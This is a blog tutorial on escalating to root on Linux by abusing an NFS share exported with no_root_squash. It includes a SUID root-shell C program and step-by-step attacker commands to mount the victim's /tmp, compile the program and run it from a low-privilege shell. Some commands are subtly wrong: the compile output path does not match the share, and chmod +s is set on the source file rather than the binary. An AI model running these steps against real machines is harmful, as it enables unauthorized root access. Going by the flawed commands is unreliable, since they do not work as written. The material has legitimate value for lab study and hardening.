Skip to content

NFS weak permissions(Linux Privilege Escalation)

If you have a Low privilege Shell on any machine and you found that a machine has an NFS share you might be able to use that to escalate privileges. Depending on how it is configured. Let’s take a tour to understand Weak permission on NFS server.

Index

    1. What is NFS?
    2. What is root_sqaush and no_root_sqaush?
    3. Required Tools and Program FIle.
    4. Exploit NFS Weak Permission.

What is NFS?

The Network File System (NFS) is a client/server application that lets a computer user view and optionally store and update files on a remote computer as though they were on the user’s own computer. The NFS protocol is one of several distributed file system standards for network-attached storage (NAS).


What is root_sqaush and no_root_sqaush?

Root Squashing(root_sqaush) parameter prevents having root access to remote root users connected to NFS volume. Remote root users are assigned a user “nfsnobody” when connected, which has the least local privileges. Alternatively “no_root_squash option turns off the “squashing of root user” and gives the remote user root access to the connected system. System administrators should always use  “root_squash” parameter when configuring NFS drives to make sure remote root users are always “squashed”.

NOTE : For Exploiting this issue NFS must be configured with no_root_sqaush.


Required Tools and Program FIle.

This list is very short u just need a showmount, mount with nfs support.

  • showmount
  • mount
  • C Program FIle or ( optional )

For installing required commands(Debian based):

apt-get install nfs-common
apt-get install cifs-utils

Program File(suid-shell.c):

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
    setuid(0);
    system("/bin/bash");
    return 0;
}

Exploit NFS and Get Root Shell.

now, that I had limited shell so take a look at “/etc/exports” file. /etc/exports file contains configurations and permissions of which folders/file systems are exported to remote users.

nsf-export

So  /tmp folder is shareable and remote user can mount it. let’s take a look on NFS configuration flags we have “rw” (Read, Write), “sync” and  “no_root_squash” parameter which is not secure and we already talked about what is Root Squashing.

Attacker Machine.

1. Open command prompt and type
showmount -e [Linux VM IP Address]

2. Make a Directory to mount remote system.

mkdir /tmp/test

3. Mount Remote /tmp folder on our /tmp/test:

mount -o rw,vers=2 [Linux VM IP Address]:/tmp /tmp/test

4. Drop our c program file.

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/test/suid-shell.c

4. Compile:

gcc /tmp/test/suid-shell.c -o /tmp/1/suid-shel

5. Set SUID bit 

chmod +s /tmp/test/suid-shell.c

Victim Low Privilege Shell

I get back to my low privilege shell user access on the victim server, all I had to do is to execute the suid-shell shell in /tmp folder.

cd /tmp
./suid-shell

Got Root… YaaaHoooo…

 

 


Thanks For Reading. Any Feeback please Share in the comment section. 😉

Happy Hacking.

Published inPost ExploitPrivilege Escalation

2 Comments

  1. Anguson Anguson

    I have a question, that I was looking to answer for quite some time. I am going through metasploitable and currently exploring NFS shares. My configuration file for NFS looks exacly like yours. I have gone through the steps of mounting and browsing the shares, I can create and copy files from my host. Question is: why if I upload a reverse shell back to, when executed I am basically pwning myself instead of a target ? I must be missing something…

    • this is post exploit for exploiting this issue your need a any level(privilege low or high) on target. first mount target in your system and upload reverse shell, add permission and go to your initial shell and execute.

Leave a Reply

Your email address will not be published. Required fields are marked *